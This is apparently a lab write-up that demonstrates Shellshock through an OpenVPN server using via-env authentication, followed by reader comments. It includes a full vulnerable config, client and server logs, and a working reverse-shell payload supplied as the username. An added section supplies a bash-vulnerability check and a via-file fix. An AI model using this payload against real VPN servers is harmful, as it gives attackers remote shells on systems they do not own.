To get started, our lab will use a pair of virtual machines running Kali Linux 1.0.6. The key part is to configure the OpenVPN server with the auth-user-pass-verify option in via-env mode, which hands the client-supplied "username" and "password" to the verification script as environment variables. If you already know Shellshock, you will see that this practice puts OpenVPN in a rather dangerous position:
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert kali.crt
key kali.key # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
Note that script-security must be at least 3: level 2 is enough to call user-defined scripts and executables, but only level 3 allows passwords to be passed to them through environment variables, which is exactly what via-env does.
The next step is to create the file user.sh in /etc/openvpn/ (make sure it has the execute permission it needs):
### user.sh
#!/bin/bash
# What this script does is irrelevant to the attack: with via-env OpenVPN has
# already placed the client-supplied strings in $username and $password, and a
# Shellshock-vulnerable bash runs the payload while importing them, before the
# first line below executes. Exit status 0 would mean "accept"; in this lab the
# PAM plugin still rejects the login.
echo "$username"
echo "$password"
Now we start our vulnerable OpenVPN server:
Then we go to our second virtual machine (10.71.7.90, the one that will act as the client) and start a netcat listener on port 4444:
From another tab we launch the openvpn client:
And we supply our payload as both username and password:
() { :;};/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &
As you know, bash can open a socket through exec and redirection to/from the pseudo-path /dev/tcp/<hostname>/<port> or /dev/udp/<hostname>/<port>, so the trailing command sends an interactive shell back to our listener.
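Added here as an example, not code from the original post: a small POSIX shell script that checks whether the local bash still imports function definitions from arbitrary environment variables (the mechanism via-env exposes to the client) and contrasts it with via-file delivery, where OpenVPN writes the credentials to a temporary file and the script reads them back as plain data. It assumes a bash binary on PATH; the credential pair alice/s3cret and all function names are made up for the demo.

```shell
#!/bin/sh
# Added example, not code from the original post. Reproduces the via-env hazard on
# the local machine and shows the via-file variant that keeps the client string out
# of the environment. Assumes `bash` on PATH; alice/s3cret is a demo credential.

PAYLOAD='() { :;}; echo SHELLSHOCKED'

# Does this bash still import function definitions from arbitrary env vars and run
# the trailing command? That is the step OpenVPN's via-env mode exposes: the
# client-supplied string lands in $username before bash starts user.sh.
# Exit 0 = vulnerable, 1 = patched, 2 = no bash on this host.
bash_imports_env_functions() {
    command -v bash >/dev/null 2>&1 || return 2
    # `bash -c true` runs nothing of its own; any output comes from the import step.
    out=$(env username="$PAYLOAD" bash -c true 2>/dev/null)
    [ "$out" = "SHELLSHOCKED" ]
}

# Stand-in for via-file delivery: OpenVPN writes "username\npassword\n" to a file
# under --tmp-dir and passes its path to the script as $1. Here we write the file
# and read it back the way an auth script would, into AUTH_USER / AUTH_PASS.
# IFS= and -r keep leading spaces and backslashes intact.
load_via_file() {
    f=$(mktemp) || return 2
    printf '%s\n%s\n' "$1" "$2" > "$f"
    { IFS= read -r AUTH_USER; IFS= read -r AUTH_PASS; } < "$f"
    rm -f "$f"
}

# Echoes the username exactly as the via-file script would see it: data, not code.
via_file_username() { load_via_file "$1" "$2" && printf '%s\n' "$AUTH_USER"; }

# Minimal auth-script logic for via-file: 0 only when the pair matches the demo
# credential; a real script would consult a password database instead.
via_file_auth() {
    load_via_file "$1" "$2" || return 2
    [ "$AUTH_USER" = "alice" ] && [ "$AUTH_PASS" = "s3cret" ]
}

if bash_imports_env_functions; then
    echo "local bash executes code from env vars: via-env would hand it the client string"
else
    echo "local bash does not import functions from env vars (or bash is absent)"
fi
printf 'via-file sees the payload as plain data: %s\n' "$(via_file_username "$PAYLOAD" x)"
via_file_auth alice s3cret && echo "via-file auth: alice accepted"
via_file_auth "$PAYLOAD" x || echo "via-file auth: payload rejected, nothing executed"
```

Run it on the VPN host with `sh check_via_env.sh`. The server-side fix is to replace `auth-user-pass-verify /etc/openvpn/user.sh via-env` with `auth-user-pass-verify /etc/openvpn/user.sh via-file` (the `tmp-dir` must be writable by the `nobody` user the daemon drops to) and lower `script-security` back to 2; via-env is only tolerable once every bash on the host carries the Shellshock patches, and the OpenVPN manual still warns that it exposes the password to anyone who can read the script's process environment.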
This is what we see on the client:
root@kali2:~# openvpn --client --remote 10.71.7.96 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
Fri Oct 3 09:08:16 2014 OpenVPN 2.2.1 i486-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Jun 19 2013
Enter Auth Username:() { :;};/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &
Enter Auth Password:
Fri Oct 3 09:08:19 2014 IMPORTANT: OpenVPN's default port number is now 1194, based on an official port number assignment by IANA. OpenVPN 2.0-beta16 and earlier used 5000 as the default port.
Fri Oct 3 09:08:19 2014 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Fri Oct 3 09:08:19 2014 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Fri Oct 3 09:08:19 2014 LZO compression initialized
Fri Oct 3 09:08:19 2014 UDPv4 link local (bound): [undef]
Fri Oct 3 09:08:19 2014 UDPv4 link remote: [AF_INET]10.71.7.96:1194
Fri Oct 3 09:08:22 2014 [kali] Peer Connection Initiated with [AF_INET]10.71.7.96:1194
Fri Oct 3 09:08:24 2014 AUTH: Received AUTH_FAILED control message
Fri Oct 3 09:08:24 2014 SIGTERM[soft,auth-failure] received, process exiting
And this on the server:
root@kali:/etc/openvpn# openvpn server.conf
Fri Oct 3 09:08:07 2014 OpenVPN 2.2.1 i486-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Jun 19 2013
Fri Oct 3 09:08:07 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Fri Oct 3 09:08:07 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Fri Oct 3 09:08:07 2014 Diffie-Hellman initialized with 1024 bit key
Fri Oct 3 09:08:07 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Fri Oct 3 09:08:07 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Fri Oct 3 09:08:07 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Fri Oct 3 09:08:07 2014 ROUTE default_gateway=10.71.7.1
Fri Oct 3 09:08:07 2014 TUN/TAP device tun0 opened
Fri Oct 3 09:08:07 2014 TUN/TAP TX queue length set to 100
Fri Oct 3 09:08:07 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Fri Oct 3 09:08:07 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Fri Oct 3 09:08:07 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Fri Oct 3 09:08:07 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Fri Oct 3 09:08:07 2014 GID set to nogroup
Fri Oct 3 09:08:07 2014 UID set to nobody
Fri Oct 3 09:08:07 2014 UDPv4 link local (bound): [undef]
Fri Oct 3 09:08:07 2014 UDPv4 link remote: [undef]
Fri Oct 3 09:08:07 2014 MULTI: multi_init called, r=256 v=256
Fri Oct 3 09:08:07 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Fri Oct 3 09:08:07 2014 Initialization Sequence Completed
Fri Oct 3 09:08:19 2014 MULTI: multi_create_instance called
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Re-using SSL/TLS context
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 LZO compression initialized
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Local Options hash (VER=V4): '530fdded'
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Expected Remote Options hash (VER=V4): '41690919'
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 TLS: Initial packet from [AF_INET]10.71.7.90:1194, sid=b64ed4da e199b1c6
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &' failed to authenticate: Error in service module
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.71.7.90/4444_0__1__
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 [] Peer Connection Initiated with [AF_INET]10.71.7.90:1194
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 PUSH: Received control message: 'PUSH_REQUEST'
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 Delayed exit in 5 seconds
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Fri Oct 3 09:08:26 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Fri Oct 3 09:08:29 2014 10.71.7.90:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
And the result in our netcat listener:
It's vulnerable!
Have a good weekend and be good!
Awesome, and how scary!
Fucking bash
And this (I mean the bug) is supposedly discovered just now, after 15 years? I'm cracking up!
That's the weird part... why now?? Either something is being hidden from us or we overestimate humans (or at least the information security community)...